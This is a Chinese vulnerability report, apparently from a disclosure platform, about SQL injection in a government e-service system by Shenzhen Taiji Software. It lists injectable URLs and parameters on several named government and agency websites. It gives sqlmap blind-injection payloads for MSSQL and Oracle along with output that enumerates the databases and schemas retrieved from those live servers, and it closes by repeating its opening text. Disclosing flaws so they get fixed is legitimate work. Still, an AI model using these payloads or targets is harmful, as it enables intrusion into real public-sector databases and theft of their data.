### 简要描述：深夜来一发 ### 详细说明：深圳太极软件有限公司是一套专门的政务服务系统，大量用户在用。这个就不多说了。注入点： ``` http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC ``` zzjgdm=存在注入，就以贵州省电子政务为例，仅跑出表，其他不做测试。 payload： ``` Place: GET Parameter: zzjgdm Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zzjgdm=009390359' AND 4047=4047 AND 'ZDFM'='ZDFM&depName=%CA%A1%C3%F1%D5%FE%CC%FC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: zzjgdm=009390359' AND 3874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mJmn'='mJmn&depName=%CA%A1%C3%F1%D5%FE%CC%FC ``` [ 太极软件.png

](https://images.seebug.org/upload/201504/150336083ea8abe6ec12d85d3679afebeecd7fa1.png) ``` http://www.cqspbxz.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009290753&depName=%C7%F8%B7%BF%B9%DC%BE%D6 ``` ``` Parameter: zzjgdm Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zzjgdm=009290753' AND 2319=2319 AND 'ZTze'='ZTze&depName=%C7%F8%B7%BF%B9%DC%BE%D6 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: zzjgdm=009290753' AND 9798=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Uvqz'='Uvqz&depName=%C7%F8%B7%BF%B9%DC%BE%D6 --- [10:06:26] [INFO] testing Microsoft SQL Server [10:06:26] [INFO] confirming Microsoft SQL Server [10:06:28] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [10:06:28] [INFO] fetching database names [10:06:28] [INFO] fetching number of databases [10:06:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [10:06:28] [INFO] retrieved: 21 ``` [ 太极软件1.png

](https://images.seebug.org/upload/201504/1512303796f50620dfdef3f72ca895d30a021564.png) ``` ``` ``` http://www.ddkspdt.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009286236&depName=%C7%F8%D6%CA%BC%E0%BE%D6 ``` #2: /showZXInfo.jsp?ID=存在注入 ``` http://www.cqszzw.gov.cn/application/gzhd/zxzx/showZXInfo.jsp?ID=20111219175109007 ``` payload: ``` Place: GET Parameter: ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=20111219175109007' AND 4863=4863 AND 'hsAz'='hsAz Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: ID=20111219175109007' AND 4007=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'VBTD'='VBTD --- [00:47:43] [INFO] testing Microsoft SQL Server [00:47:43] [INFO] confirming Microsoft SQL Server [00:47:45] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [00:47:45] [INFO] fetching database names [00:47:45] [INFO] fetching number of databases [00:47:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [00:47:45] [INFO] retrieved: 5 [00:47:47] [INFO] retrieved: master [00:48:03] [INFO] retrieved: model [00:48:17] [INFO] retrieved: msdb [00:48:30] [INFO] retrieved: tempdb [00:48:47] [INFO] retrieved: web_shizhu ``` [ 太极软件2.png

](https://images.seebug.org/upload/201504/151235443f2bccdf54b32c4ad73f8cb51cdd0326.png) #3: 在这个文件下/zwugk.jsp，多个参数存在注入，zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2 ``` http://61.183.35.105/application/wsbs/zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2 ``` ``` Place: GET Parameter: xiangmuDW Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 3105=3105 AND '%'='&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 2511=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(103)||CHR(115),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2 --- [12:56:54] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [12:56:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes [12:56:54] [INFO] fetching database (schema) names [12:56:54] [INFO] fetching number of databases [12:56:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [12:56:54] [INFO] retrieved: 19 [12:57:35] [INFO] retrieved: CTXSYS [13:00:49] [INFO] retrieved: DBSNMP ``` [ 太极软件3.png

](https://images.seebug.org/upload/201504/151308178b9543d4a6475ac2021e8ea5ab849b90.png) ``` http://www.cqszzw.gov.cn/application/wsbs/zwugk.jsp?queryid=111 ``` ``` Place: GET Parameter: queryid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: queryid=111%' AND 1542=1542 AND '%'=' Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: queryid=111%' AND 3688=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'=' --- [12:41:26] [INFO] testing Microsoft SQL Server [12:41:30] [INFO] confirming Microsoft SQL Server [12:41:34] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [12:41:34] [INFO] fetching database names [12:41:34] [INFO] fetching number of databases [12:41:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [12:41:34] [INFO] retrieved: 5 [12:41:45] [INFO] retrieved: master [12:43:10] [INFO] retrieved: model [12:44:11] [INFO] retrieved: msdb [12:45:10] [INFO] retrieved: tempdb [12:46:22] [INFO] retrieved: web_shizhu ``` [ 太极软件4.png

](https://images.seebug.org/upload/201504/151311293635691b7b4738f7a8345fc14b9eafb9.png) ``` http://www.xazwfw.com/application/wsbs/zwugk.jsp?selectpageno=16&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2 ``` ``` --- Place: GET Parameter: xiangmuDW Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 4085=4085 AND '%'='&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 1823=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(100)||CHR(122),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2 --- [02:23:57] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [02:23:57] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes [02:23:57] [INFO] fetching database (schema) names [02:23:57] [INFO] fetching number of databases [02:23:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [02:23:57] [INFO] retrieved: 18 [02:24:26] [INFO] retrieved: CTXSYS [02:26:44] [INFO] retrieved: DBSNMP [02:29:00] [INFO] retrieved: DMSYS [02:30:52] [INFO] retrieved: DZJC [02:32:26] [INFO] retrieved: DZJC_XIANAN_HB [02:36:45] [INFO] retrieved: EXFSYS [02:38:53] [INFO] retrieved: MDSYS [02:40:44] [INFO] retrieved: OLAPSYS [02:43:03] [INFO] retrieved: ORDSYS [02:45:17] [INFO] retrieved: OUTLN [02:47:31] [INFO] retrieved: SCOTT [02:49:16] [INFO] retrieved: SYS [02:50:20] [INFO] retrieved: SYSMAN [02:52:11] [INFO] retrieved: SYSTEM [02:54:16] [INFO] retrieved: TSMSYS [02:56:24] [INFO] retrieved: WMSYS [02:58:21] [INFO] retrieved: WZ_XIANAN_HB [03:02:26] [INFO] retrieved: XDB available databases [18]: [*] CTXSYS [*] DBSNMP [*] DMSYS [*] DZJC [*] DZJC_XIANAN_HB [*] EXFSYS [*] MDSYS [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] SCOTT [*] SYS [*] SYSMAN [*] SYSTEM [*] TSMSYS [*] WMSYS [*] WZ_XIANAN_HB [*] XDB [03:03:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xazwfw.com' ``` [ 太极软件5.png

](https://images.seebug.org/upload/201504/15131434445b012e585ed0fbd26b0aeb820506be.png) #4: resultsp.jsp?bjbh=存在注入 ``` http://222.86.58.9:8088/application/jsp/resultsp.jsp?bjbh= ``` ``` Place: GET Parameter: bjbh Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: bjbh=111' AND 3031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(79)||CHR(67)||CHR(87),5) AND 'jxlx'='jxlx --- [13:22:25] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 or 2000 web application technology: Servlet 2.4, JSP, JSP 2.0 back-end DBMS: Oracle [13:22:25] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes [13:22:25] [INFO] fetching database (schema) names [13:22:25] [INFO] fetching number of databases [13:22:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y [13:22:41] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [13:22:44] [INFO] adjusting time delay to 1 second due to good response times [13:22:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [13:22:45] [ERROR] unable to retrieve the number of databases [13:22:45] [INFO] falling back to current database [13:22:45] [INFO] fetching current database [13:22:45] [INFO] resumed: GUIZHOU_DZJC [13:22:45] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes [13:22:45] [INFO] fetching tables for database: 'GUIZHOU_DZJC' [13:22:45] [INFO] fetching number of tables for database 'GUIZHOU_DZJC' [13:22:45] [INFO] retrieved: 10 [13:22:58] [ERROR] invalid character detected. retrying.. [13:22:58] [WARNING] increasing time delay to 2 seconds 9 [13:23:07] [INFO] retrieved: T_JC_XZ ``` [ 太极软件6.png

](https://images.seebug.org/upload/201504/15132622b8e56ea7fba3db9006daecca8770906b.png) ### 漏洞证明：深圳太极软件有限公司是一套专门的政务服务系统，大量用户在用。这个就不多说了。注入点： ``` http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC ``` zzjgdm=存在注入，就以贵州省电子政务为例，仅跑出表，其他不做测试。 payload： ``` Place: GET Parameter: zzjgdm Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zzjgdm=009390359' AND 4047=4047 AND 'ZDFM'='ZDFM&depName=%CA%A1%C3%F1%D5%FE%CC%FC Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: zzjgdm=009390359' AND 3874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mJmn'='mJmn&depName=%CA%A1%C3%F1%D5%FE%CC%FC ``` [ 太极软件.png

](https://images.seebug.org/upload/201504/15132622b8e56ea7fba3db9006daecca8770906b.png)